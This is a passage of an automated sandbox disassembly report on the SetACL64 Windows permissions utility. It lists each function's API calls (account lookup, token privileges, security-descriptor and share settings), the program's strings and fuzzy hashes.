GetUserNameExW.SECUR32 ref: 00007FF69704D3DC
GetLastError.KERNEL32 ref: 00007FF69704D3E6
LeaveCriticalSection.KERNEL32 ref: 00007FF69704D52A

Part of subcall function 00007FF69704EA60: WaitForSingleObject.KERNEL32 ref: 00007FF69704EA79
Part of subcall function 00007FF69704EA60: ResetEvent.KERNEL32 ref: 00007FF69704EABC
Part of subcall function 00007FF69704EA60: ReleaseMutex.KERNEL32 ref: 00007FF69704EAC6
Part of subcall function 00007FF69704EA60: SetEvent.KERNEL32 ref: 00007FF69704EAD0

LeaveCriticalSection.KERNEL32 ref: 00007FF69704D662

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: CriticalErrorEventLastLeaveNameSectionTimeUser$CurrentFileMutexObjectReleaseResetSingleSystemThreadWait
String ID:
API String ID: 3424761043-0
Opcode ID: 82ea7e4afd397da255eb45e089590796cd57700379ab681c382546437c843004
Instruction ID: ab50fb5e798c2482293c598b9ebf8d672711836907aabe1d25d22cc8e2dad85a
Opcode Fuzzy Hash: 82ea7e4afd397da255eb45e089590796cd57700379ab681c382546437c843004
Instruction Fuzzy Hash: A3C1BBB2B08A4296EB20DF64E4842AC23B1FB55BD8F4042B5DB5DD7799EF38E544D340

Function 00007FF69706F3C0 Relevance: 13.7, APIs: 9, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameW.ADVAPI32 ref: 00007FF69706F44D
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF69706E9EF), ref: 00007FF69706F453
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF69706E9EF), ref: 00007FF69706F45E
LookupAccountNameW.ADVAPI32 ref: 00007FF69706F54D
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF69706E9EF), ref: 00007FF69706F557
IsValidSid.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF69706E9EF), ref: 00007FF69706F593
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706F647
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706F64D
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69706F653

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorLast$AccountLookupName_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskValid
String ID:
API String ID: 311209037-0
Opcode ID: c7e2f3c1dd69d1f4acddb5ab312ab4255335677c4fd2a3498e6ade446b79d788
Instruction ID: b41ce472b9cf1156b1881b72c8fddd1e868fe3a8258eef19343cd7eee5a38216
Opcode Fuzzy Hash: c7e2f3c1dd69d1f4acddb5ab312ab4255335677c4fd2a3498e6ade446b79d788
Instruction Fuzzy Hash: 7671A4A2A19B8281EA349F15A85437D73A5FB84BE4F144371EA5DC7BD8DF7CE6808340

Function 00007FF697053FD8 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE ref: 00007FF697054000
GetLastError.KERNEL32 ref: 00007FF69705400A
CloseHandle.KERNEL32 ref: 00007FF697054019
GetLastError.KERNEL32 ref: 00007FF697054023
CloseHandle.KERNEL32 ref: 00007FF697054030

Strings

Prepare, xrefs: 00007FF697054124
Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6970540F4

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: CloseErrorHandleLast$AdjustPrivilegesToken
String ID: Prepare$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with
API String ID: 1992325626-2245062721
Opcode ID: 711c004ea780279e093e6d90f040bc076e91dc0aa13779505b0cf60af36ac5f3
Instruction ID: 19ab5396a8df83d1d24d2fc48c66810c60eeb97ac8594a5bb6f166d3626e44c5
Opcode Fuzzy Hash: 711c004ea780279e093e6d90f040bc076e91dc0aa13779505b0cf60af36ac5f3
Instruction Fuzzy Hash: 89A161B2B1974682EE24CB66E4443A963A1FB94BE4F505135EA5DC77E4DFBCE180C700

Function 00007FF697086C40 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF697083E64: GetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083E73
Part of subcall function 00007FF697083E64: SetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083F11

TranslateName.LIBCMT ref: 00007FF697086CAD
TranslateName.LIBCMT ref: 00007FF697086CE8
GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF697079674), ref: 00007FF697086D2D
IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF697079674), ref: 00007FF697086D55

Strings

utf8, xrefs: 00007FF697086E39

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorLastNameTranslate$CodePageValid
String ID: utf8
API String ID: 2136749100-905460609
Opcode ID: 6bdea75530d7039159817e5ab3c7b28df4470465f8a0306e69d102c21d090332
Instruction ID: 6a3644c7b09ff5e121b3f9298c8bb6c76137f6214e9082137c2f1e20dc6e0b2d
Opcode Fuzzy Hash: 6bdea75530d7039159817e5ab3c7b28df4470465f8a0306e69d102c21d090332
Instruction Fuzzy Hash: 0F917BB2A08782C6EB349F21D4412F923A4EB94BC4F4541B2DA8DC7786EF3EE951C701

Function 00007FF6970313F0 Relevance: 4.5, APIs: 3, Instructions: 31synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE ref: 00007FF6970313FB
CreateEventW.KERNEL32 ref: 00007FF697031412
CreateEventW.KERNEL32 ref: 00007FF697031429

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Create$Event$Mutex
String ID:
API String ID: 646228171-0
Opcode ID: 6379593e08b2bd55a17043a86bbd2af44a1a5acfd305ab3cea2657f90ecb20a5
Instruction ID: 0ae98acd666d16229f879231f769257192467602d343f4b184e5fff8884a0570
Opcode Fuzzy Hash: 6379593e08b2bd55a17043a86bbd2af44a1a5acfd305ab3cea2657f90ecb20a5
Instruction Fuzzy Hash: 3C015EF1D18A5281F774CB24AC4272137A2EF54790FA44675D54AC15A0DFBD72414600

Function 00007FF69708B74C Relevance: 1.4, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF69708B7F1

Part of subcall function 00007FF697084FDC: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF69708403D,?,?,0000B6CF377E791F,00007FF69707E201,?,?,?,?,00007FF69708BCFA,?,?,00000000), ref: 00007FF697085031

Part of subcall function 00007FF697085054: HeapFree.KERNEL32(?,?,00007FF6970834C7,00007FF697084ADC,?,?,?,00007FF697084E5F,?,?,0000B6CF377E791F,00007FF697085874,?,?,?,00007FF6970857A7), ref: 00007FF69708506A
Part of subcall function 00007FF697085054: GetLastError.KERNEL32(?,?,00007FF6970834C7,00007FF697084ADC,?,?,?,00007FF697084E5F,?,?,0000B6CF377E791F,00007FF697085874,?,?,?,00007FF6970857A7), ref: 00007FF69708507C

Part of subcall function 00007FF697090AE0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF697090B0E

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorHeapLast$AllocateFree_invalid_parameter_noinfo
String ID:
API String ID: 3806578645-0
Opcode ID: 9a6b151fff7fe705bade6372d1f70266f2a0bdc1aa92e79f8fe535abbd962b58
Instruction ID: f5a8db54e0720720727a3865258b912a93a457fe18951e596a3d2c49fb993973
Opcode Fuzzy Hash: 9a6b151fff7fe705bade6372d1f70266f2a0bdc1aa92e79f8fe535abbd962b58
Instruction Fuzzy Hash: 7641D5A1F0924741EA709B2668517FAA680FF94BC0F18417AEE5DC7BC1FE3EE4018700

Function 00007FF6970794BC Relevance: .3, Instructions: 307COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorLastNameTranslatetry_get_function$CodePageValid_invalid_parameter_noinfo
String ID:
API String ID: 3827717455-0
Opcode ID: 177ebafa814932736604c983462749e15f512918868e0eeccc23599b249f1295
Instruction ID: a4661bed0cd9582bf598aad0b8f0fac5916502bc278c261d30a3165cf583760a
Opcode Fuzzy Hash: 177ebafa814932736604c983462749e15f512918868e0eeccc23599b249f1295
Instruction Fuzzy Hash: 18C1B2A6A1868285EB70DB66D8107FE27A0FB947C8F404176DE8DC7699EF3CE545C700

Function 00007FF697053A20 Relevance: 47.8, APIs: 21, Strings: 6, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 00007FF697053A20
GetCurrentProcess.KERNEL32 ref: 00007FF697053CC0
OpenProcessToken.ADVAPI32 ref: 00007FF697053CD3
GetLastError.KERNEL32 ref: 00007FF697053CDD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970543FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697054401
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697054407
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705440D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697054413
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697054419
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705441F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697054425
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705442B

Strings

Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF697053B7A
Prepare, xrefs: 00007FF697053BAA, 00007FF697053E67, 00007FF697054124
Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF697053E37
SeTakeOwnershipPrivilege, xrefs: 00007FF697053F39
Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6970540F4
SeRestorePrivilege, xrefs: 00007FF697053C7C

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLastProcess$CurrentOpenToken
String ID: Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeRestorePrivilege$SeTakeOwnershipPrivilege
API String ID: 6815931-1541018277
Opcode ID: ecfdb7b02d6f6838b6ac89f80637403c6b442040516c981f8ff8b7f4b81811b7
Instruction ID: 95f9c33fa1476ffee1c2af5abca079a32bb9f009a5e54d17a0987b1e1558cc88
Opcode Fuzzy Hash: ecfdb7b02d6f6838b6ac89f80637403c6b442040516c981f8ff8b7f4b81811b7
Instruction Fuzzy Hash: AB2284B2B1978281EE249B69E4443ADA361FB857E4F505275EA5DC3BE9DF7CE080C700

Function 00007FF697052DCB Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 532
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970534DB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970534E1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970534E7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697053503
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697053509

Part of subcall function 00007FF69705B710: RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF69705B812

Part of subcall function 00007FF697039520: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697039606
Part of subcall function 00007FF697039520: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69703960C

Strings

/, xrefs: 00007FF697053481
Run, xrefs: 00007FF6970530B5, 00007FF697053375
Prepare, xrefs: 00007FF6970535A1
SetACL finished successfully., xrefs: 00007FF697053325
read, xrefs: 00007FF697054AAB
Object path and/or object type not specified., xrefs: 00007FF697053573
Action 'reset children' was used without specifying whether to reset the DACL, SACL, or both. Nothing was reset., xrefs: 00007FF69705307E

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskEnum
String ID: SetACL finished successfully.$/$Action 'reset children' was used without specifying whether to reset the DACL, SACL, or both. Nothing was reset.$Object path and/or object type not specified.$Prepare$Run$read
API String ID: 1222371136-710240214
Opcode ID: 6fd56c362ca3c0bd5d5ac0762c920353aa005472101274b7ea8be5c822556958
Instruction ID: 23db0b28454b5eb586edfa0982a5cf2458d766493ac9338fdb3a45c4e31c0d95
Opcode Fuzzy Hash: 6fd56c362ca3c0bd5d5ac0762c920353aa005472101274b7ea8be5c822556958
Instruction Fuzzy Hash: 4D32BFB2B1978282EA74DB26E4853AEA361FB457D4F404572EA9CC3AD9DF7CE144C700

Function 00007FF697067715 Relevance: 30.4, APIs: 16, Strings: 1, Instructions: 600registryfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF697067A14
GetLastError.KERNEL32 ref: 00007FF697067A35
CloseHandle.KERNEL32 ref: 00007FF697067B52
RegCloseKey.ADVAPI32 ref: 00007FF697067B62
SetSecurityInfo.ADVAPI32 ref: 00007FF697067C29

Part of subcall function 00007FF6970442A0: GetCurrentProcess.KERNEL32 ref: 00007FF6970442DA
Part of subcall function 00007FF6970442A0: OpenProcessToken.ADVAPI32 ref: 00007FF6970442EC
Part of subcall function 00007FF6970442A0: GetLastError.KERNEL32 ref: 00007FF6970442F6

NetShareGetInfo.NETAPI32 ref: 00007FF697067DD6
NetApiBufferFree.NETAPI32 ref: 00007FF697067E10
SetNamedSecurityInfoW.ADVAPI32 ref: 00007FF697067E5D
NetShareSetInfo.NETAPI32 ref: 00007FF697067EDA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697067FE2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697067FE8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697067FEE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697067FF4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697068000
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697068006

Strings

SeSecurityPrivilege, xrefs: 00007FF697067749

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Info$CloseErrorLastProcessSecurityShare$BufferCreateCurrentFileFreeHandleNamedOpenToken
String ID: SeSecurityPrivilege
API String ID: 4200377542-2333288578
Opcode ID: 6e52a741af2d2e6aca60200d1f76bf38ab8845e3248805846f20d0d5f9e7f980
Instruction ID: 372bdca681f2688d1aa754e6088c37aff714f9b90cabd18d8b2fd07916b4c490
Opcode Fuzzy Hash: 6e52a741af2d2e6aca60200d1f76bf38ab8845e3248805846f20d0d5f9e7f980
Instruction Fuzzy Hash: 4A427FA2A19B4285EB208F25D4547AD33A1FB847E8F506275EA5DC7AD9DF38E680C340

Function 00007FF69704CD0A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 226
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF69704D0A0: EnterCriticalSection.KERNEL32 ref: 00007FF69704D0CB

Part of subcall function 00007FF697044FC0: GetModuleFileNameW.KERNEL32 ref: 00007FF69704503A

RegisterEventSourceW.ADVAPI32 ref: 00007FF69704CFAC
LeaveCriticalSection.KERNEL32 ref: 00007FF69704D051
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69704D084
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69704D08A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69704D090

Strings

DefaultEventSource, xrefs: 00007FF69704CDE1

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterEventFileLeaveModuleNameRegisterSource
String ID: DefaultEventSource
API String ID: 352910984-1672983561
Opcode ID: 9ab4e8bb403d8240f21ffea30b4f19ad447ea429c625c95da4614829f2c2d001
Instruction ID: 13412c2003b6ab8c2abb4f54ff4c93efc0a31621403ec5d16301afe5cf9eaaa5
Opcode Fuzzy Hash: 9ab4e8bb403d8240f21ffea30b4f19ad447ea429c625c95da4614829f2c2d001
Instruction Fuzzy Hash: E0A15DA2B15A8195EF108F38D4453AD2361EF647ECF408675E76C87ADAEF78E180D340

Function 00007FF697031649 Relevance: 9.0, APIs: 6, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF697031653
LeaveCriticalSection.KERNEL32 ref: 00007FF697031667
EnterCriticalSection.KERNEL32 ref: 00007FF69703169C
CloseHandle.KERNEL32 ref: 00007FF6970316B0
DeregisterEventSource.ADVAPI32 ref: 00007FF6970316C9
LeaveCriticalSection.KERNEL32 ref: 00007FF6970316D9

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseDeregisterEventHandleSource
String ID:
API String ID: 1038480651-0
Opcode ID: 7186af4088bc47e5858a979c3040af2f97af1d69e41cea5f9ceaa15bf5e240b6
Instruction ID: d14c80ef028b6e54d9edb29c7b5abd81ba6ff36180df642745c21ecc22e30091
Opcode Fuzzy Hash: 7186af4088bc47e5858a979c3040af2f97af1d69e41cea5f9ceaa15bf5e240b6
Instruction Fuzzy Hash: 00010CA1A0D942C9FAB49B56BCA433463A5FF99FD1F4841B1C94FC2264DF3CB5458200

Function 00007FF69705B710 Relevance: 7.7, APIs: 5, Instructions: 167
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF69705B812
RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF69705B913
RegCloseKey.ADVAPI32 ref: 00007FF69705B935
RegCloseKey.ADVAPI32 ref: 00007FF69705B9EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705BC21
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705BC27
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705BC2D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705BC33

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseEnum
String ID:
API String ID: 315095564-0
Opcode ID: 0bbdec918eac68fc3db2708bcef67c58192818c05ae192fec8c5e1946f35cd7f
Instruction ID: 03837182fd33a55395cf5551cc8d8447154cc3c1208de34aac007759a0b0a60b
Opcode Fuzzy Hash: 0bbdec918eac68fc3db2708bcef67c58192818c05ae192fec8c5e1946f35cd7f
Instruction Fuzzy Hash: 99618EB2B18B8185F720DB65E8443AE63B5EB887D8F104135EF8CD7A99EE38E455C344

Function 00007FF69707E62C Relevance: 7.6, APIs: 5, Instructions: 60
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69707E650
CreateThread.KERNELBASE ref: 00007FF69707E691
GetLastError.KERNEL32 ref: 00007FF69707E69F
CloseHandle.KERNEL32 ref: 00007FF69707E6BC
FreeLibrary.KERNEL32 ref: 00007FF69707E6CB

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
